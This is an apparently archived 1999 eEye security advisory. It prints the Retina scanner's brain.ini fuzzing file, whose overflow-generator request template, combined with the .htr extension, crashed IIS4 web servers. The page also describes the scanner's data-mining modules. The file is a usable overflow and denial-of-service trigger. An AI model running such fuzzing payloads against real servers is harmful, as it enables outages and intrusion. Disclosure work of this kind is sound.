http://www.eeye.com/database/advisories/ad06081999/ad06081999.html Retina vs. IIS4, Round 2 The Brain File The followng is a listing of the Brain.ini file that Retina uses for it's miner module. this is the actual file listing that uncovered the crash in IIS4. We trimed out some variables that are not being used. We will explain more about how the brain file works below. To install the brain file just copy it to the following path: c:\program files\retina\modules\retina\miner\brain.ini Downloads: brain.ini [General] Title=HTTP Miner [Commands] 1=GET /%%passwordpath%%/%%$RPT(65,40,10)%%.%%extention%% HTTP/1.0 [Variables] cgi-bin=cgi-bin,cgi,bin,cgibin,data,dat,exec,apps,secure,hide, extention=html,htx,asp,exe,xml,ini,htr,txt,dat,dbf,lst,data, passwordpath=password,passwords,pass,users,clients,admins,store, passwordfile=password,passwords,pass,users,clients,admins,store, How the brain file works To explain the brain file we need to explore some of Retina's features and explain how brain files are constructed. Retina's AI (Artificial Intelligence) Engine The most limiting trait of a program is the rigidity of the code (Logic) built into it. It is written by a human to handle a set feature of logic. So in the case of a network auditing tool, the logic is designed to handle what the programmer has instructed it to do. But what if the program has its own knowledge base, i.e. it records what it finds, then compares all of its findings and then it catalogs the information based on a defined set of rules. As the application runs it will become familiar with the norm and be able to recognize the exception to the norm and then be able to report the exception. This is one of the most powerful technologies in Retina, and is being used in two of the existing modules in a limited way, because of security reasons we did limit the capability of this feature set as we define how we can protect it from being abused. Yes this feature is very powerful and can be used to DoS (Denial of Service) servers and do data mining on server content. The AI Engine at work Here we will describe some of the data mining capabilities we have currently in Retina, the following capabilities might be disabled in current beta releases because of the security reasons mentioned above. The Browser Module is used to collect links and action URLs from a web site to identify all third level domain names associated with the domain being scanned, as the domain list is built Retina provides the list as an optional scan list. This capability will allow the auditor to identify all possible servers, applications and IP addresses that might be a weak link in the chain of security surrounding the domain. The Tracer Module is used to perform simple trace route to the target IP address, very simple in nature but the information collected along the way can be a list of possible gateways, routers and / or proxies that need to be scanned to make sure that the security is audited at all entry points to the network. The Scanner Module is used to scan for open ports, but when an IP address has different open ports than the rest of the sub net, it is a possibility that special applications are running on that server or a user is using client application that has that port open. This can be used to identify the port and add it to a list warnings that need to be checked. The Brain File The findings from the above mentioned are then logged in what we call a brain file, the brain file is a list of commands, variables and actions to be used in a time consuming auditing operation, much like brute forcing, but the variables are intelligently limited so the results are more accurate. Currently The only module we are releasing that acts upon this data is the Miner Module, which takes a brain file and constructs queries against web servers and reports anything other than (File not found). In the above example brain file, the Miner module generates commands based on a query command and all varaibles collected within the barin file. The underlined directive "%%$RPT(65,40,10)%%" is an overflow generator, 65 is the ascii character we want to repeat, 40 is the number of times we want to repeat the loop, and 10 is the length to increment the string by. In the variables section we list all different words we want to try in all possible combinations. the underlined htr extention is what brought our server down. Copyright (c) 1999 eEye Digital Security Team Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com www.eEye.com Retina vs. IIS4, Round 2 Retina vs. IIS4, Round 2 - The Exploit